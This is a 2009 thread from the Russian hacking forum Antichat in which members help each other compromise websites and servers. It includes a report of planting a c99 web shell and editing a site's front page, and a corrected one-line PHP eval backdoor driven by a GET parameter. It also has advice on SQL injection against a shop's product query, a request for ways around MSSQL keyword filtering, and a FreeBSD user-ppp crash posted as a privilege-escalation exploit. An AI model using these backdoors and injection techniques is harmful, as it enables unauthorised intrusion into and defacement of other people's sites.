ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
08.09.2009, 03:30
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
все замутил)))
спасибо попугаю за его скрипит
создал в той дире с99 хз в чем дело было 
ап
дело наверно в том что у деда где висит этот сайт,нет белого айпи,и аплоад не работал.
и шелл тоже файлы не грузить.Зато морда правиться 
Последний раз редактировалось Shadrin; 08.09.2009 в 03:51..
|
|
|
08.09.2009, 08:30
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Записал <?eval($_GET[e]);?> ,при запросе файл.php?e=phpinfo(); вижу в пустую стариницу
и исходном коде <?eval($_GET[e]);?>
Пробел нужен, <?php eval($_GET[e]); ?>
|
|
|
|
08.09.2009, 14:46
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 7
Провел на форуме:
31392
Репутация:
0
|
|
помогите с инекцией как сделать правильный запрос
SELECT SQL_CALC_FOUND_ROWS DISTINCT i.id, i.dimensions, i.prweight, i.prtype, i.processor, i.slots2 as slots, i.cards2 as cards, i.os2 as os, i.memory2 as memory, i.description2 as description, i.display2 as display, i.resolution2 as resolution, i.battery2 as battery, i.communication2 as communication, i.other2 as other, i.control2 as control, i.handcr2 as handcr, i.adddevice2 as adddevice, i.contents2 as contents, i.apps2 as apps, i.price, i.pricepromo, i.text2 as text, date_format(i.addtime,'%d/%m/%Y') as litaddtime, if(i.instock = 1,'instock','notinstock') as state, if(i.title2 <>'', i.title2,i.title2) as title, if(c.title2 <>'',c.title2,c.title2) as category, br.title as brand, br.onhp as otherbr, ifnull(im1.image,im.image) as image, im.firstimage, if(i.category_id in(1,3),1,0) as pdas, i.brand_id, i.category_id, i.status FROM items as i left join brands as br on i.brand_id = br.id left join categories as c on i.category_id = c.id left join images as im on im.item_id = i.id left join images as im1 on im1.item_id = i.id and im1.firstimage = 1 WHERE i.active=1 AND i.status ='Active' GROUP BY i.id HAVING 1=1 AND ( id='a'' OR title like '%a'%' or description like '%a'%' or communication like '%a'%' or other like '%a'%' or contents like '%a'%' or apps like 'a'' or memory like '%a'%' or display like '%a'%' or category like '%a'%' or brand like '%a'%' or processor like '%a'%' or text like 'a'' ) LIMIT 0, 4
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''%' or description like '%a'%' or communication like '%a'%' or other like '%a'' at line 54
параметр передается везде где сейчас a'
|
|
|
|
08.09.2009, 14:57
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
2paypoker
%a'%
id='a''
лишная кавычка) попробуй инжектить
|
|
|
|
09.09.2009, 12:12
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
Вопрос такой,можно ли в тиблицах джумлы последних версий,найти урл самого сайта где она стоит,раньше дампил контент и искал по гуглу,а тут контент дефолтный.
спасибо
Последний раз редактировалось Shadrin; 09.09.2009 в 12:22..
|
|
|
|
09.09.2009, 17:33
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Что делать если .NET (MSSQL) режет слова, а точнее говорит что это еррор
пробовал в скобки заключать и делать типо %64%40
PHP код:
줄 76: {
줄 77: DsCom.CommandText = szQuery;
줄 78: this.dr = DsCom.ExecuteReader();
줄 79: m_nRowCount = 0;
줄 80: }
PHP код:
[SqlException (0x80131904): 키워드 'or' 근처의 구문이 잘못되었습니다.]
System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection) +1950890
System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection) +4846875
System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj) +194
System.Data.SqlClient.TdsParser.Run(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj) +2392
System.Data.SqlClient.SqlDataReader.ConsumeMetaData() +33
System.Data.SqlClient.SqlDataReader.get_MetaData() +83
System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString) +297
System.Data.SqlClient.SqlCommand.RunExecuteReaderTds(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, Boolean async) +954
System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method, DbAsyncResult result) +162
System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method) +32
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior, String method) +141
System.Data.SqlClient.SqlCommand.ExecuteReader() +89
MinWeb.Lib.DBManager.SetDataReader(String szQuery) in d:\WebData\test.com_www\App_Code\MinWebLib_DBManager.cs:78
Community_Screenshot_View.Page_Load(Object sender, EventArgs e) in d:\WebData\test.com_www\Community\Screenshot\View.aspx.cs:62
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
|
|
|
|
09.09.2009, 19:33
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Здраствуйте.
Хочу поднять прова root на сервере ОС
FreeBSD 6.3-RELEASE-p5
Сам эксплоит:
Код:
/***********************************************************************************/
/*** pppx.conf - Point to Point Protocol (a.k.a. user-ppp) exploit by sipher ***/
/*** 2003 / 12 /23 - PRIVATE CODE ***/
/*** Program terminated with signal 11, Segmentation fault. ***/
/*** #0 0xbeefdead in ?? () ***/
/***********************************************************************************/
I just tested this on FreeBSD 6.3. This bug was discovered on NetBSD. It also works on OpenBSD (unconfirmed on 4.2)
Steps to reproduce:
1. Run ppp
2. type the following (or atleat some variation of)
~/~/~/~/~/~/~/~/~/~/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxx
This will produce a segmentation violation (Core dumped).
Discovered by: sipher
Shouts: princess^pookie,spithash,burnout,#codemasters,#hackers@dalnet
Обьясните пожалуйсто что такое "user-ppp" и как его запустить? |
|
|
|
09.09.2009, 21:15
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Сообщение от SeNaP
Здраствуйте.
Обьясните пожалуйсто что такое "user-ppp" и как его запустить?
это модемный сервис в фряхе.
user PPP - это PPP уровня пользователя
Последний раз редактировалось z00MAN; 09.09.2009 в 21:20..
|
|
|
|
10.09.2009, 00:38
|
|
Познающий
Регистрация: 17.03.2007
Сообщений: 98
Провел на форуме:
193152
Репутация:
45
|
|
Столкнулся со следующей ситуацией:
PHP код:
$pageList = array();
$fileList = array();
$pageList[1] = 'Contact Information';
$pageList[2] = 'Event Information';
$pageList[3] = 'Payment Information';
$pageList[4] = 'Submit';
$fileList[1] = 'ContactBP';
$fileList[2] = 'Events';
$fileList[3] = 'Payment';
$fileList[4] = 'Success';
$file = $fileList[$pageNo];
eval( "{$file}Page::createPage(" . '$pageNo, $pageList, $theme, $fileList );' );
К $pageNO доступ извне есть, но:
1. отсекается $file = $fileList[$pageNo]
2.так же сильно обламывает $fileList = array()
Подскажите, есть ли способ какой-то обойти оба способа "защиты"? |
|
|
|
10.09.2009, 06:39
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Подскажите, есть ли способ какой-то обойти оба способа "защиты"?
нет.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
